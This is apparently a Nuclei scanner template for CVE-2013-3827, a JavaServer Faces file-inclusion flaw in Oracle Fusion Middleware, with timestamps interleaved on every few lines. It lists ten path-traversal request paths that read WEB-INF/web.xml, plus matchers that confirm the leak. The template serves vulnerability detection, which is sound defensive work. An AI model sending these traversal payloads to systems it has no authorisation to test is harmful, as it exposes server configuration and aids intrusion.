2021-06-30 10:50:41 +00:00
id : CVE-2013-3827
info :
2021-07-17 16:14:56 +00:00
name : Javafaces LFI
2021-06-30 10:50:41 +00:00
author : Random-Robbie
severity : medium
2022-05-17 09:18:12 +00:00
description : An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
2022-02-25 14:32:23 +00:00
- https://www.oracle.com/security-alerts/cpuoct2013.html
2022-05-17 09:18:12 +00:00
- http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
2023-07-11 19:49:27 +00:00
- http://rhn.redhat.com/errata/RHSA-2014-0029.html
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 5
2022-02-25 14:32:23 +00:00
cve-id : CVE-2013-3827
2022-09-06 01:33:31 +00:00
cwe-id : NVD-CWE-noinfo
2023-10-16 10:55:14 +00:00
epss-score : 0.67719
2023-11-18 12:52:17 +00:00
epss-percentile : 0.97629
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 10
2023-07-11 19:49:27 +00:00
vendor : oracle
product : fusion_middleware
tags : edb,cve,cve2013,lfi,javafaces,oracle
2021-06-30 10:50:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-30 10:50:41 +00:00
- method : GET
path :
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
2021-07-17 16:14:56 +00:00
2021-09-02 11:59:10 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-06-30 10:50:41 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-06-30 10:50:41 +00:00
words :
2021-07-17 16:14:56 +00:00
- "<web-app"
- "</web-app>"
condition : and
- type : status
status :
2022-02-25 14:32:23 +00:00
- 200
2023-11-19 08:30:54 +00:00
# digest: 490a0046304402200e32e36944d4cb2fc990b9f2ff9944403355615d135e8d79f724f1ac1a7cf65602203ded77dcb1978a9d66b54b7080d55c077af4b038cc7f6a03261e2d3275d1fc0a:922c64590222798bb761d5b6d8e72950